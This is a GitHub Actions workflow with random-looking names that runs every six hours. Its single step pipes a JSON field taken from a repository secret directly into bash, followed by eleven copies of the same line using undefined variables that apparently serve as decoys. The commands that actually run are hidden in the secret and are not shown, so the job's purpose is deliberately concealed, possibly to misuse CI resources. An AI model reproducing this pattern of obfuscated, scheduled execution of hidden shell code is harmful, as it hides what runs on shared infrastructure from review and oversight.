name: wuhaoning3214
on:
  workflow_dispatch:
  schedule:
    - cron: '25 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wuhaoning3214
        env:
          m389: ${{ secrets.m389 }}
        run: |
          echo $m389 | jq -r .w32 | /bin/bash
          echo $tugd9 | jq -r .nr459 | /bin/bash
          echo $xu8 | jq -r .wf58 | /bin/bash
          echo $hpilt75 | jq -r .pbto596 | /bin/bash
          echo $wywi15194 | jq -r .ip681 | /bin/bash
          echo $ukrfr8 | jq -r .gkq79896 | /bin/bash
          echo $mrsul091 | jq -r .qcgmd145 | /bin/bash
          echo $mnhld5 | jq -r .cfkwl73 | /bin/bash
          echo $kq8221 | jq -r .vi12177 | /bin/bash
          echo $lsitl92 | jq -r .vwan1 | /bin/bash
          echo $lfki61 | jq -r .h66 | /bin/bash
          echo $cya24 | jq -r .zfgnq6176 | /bin/bash

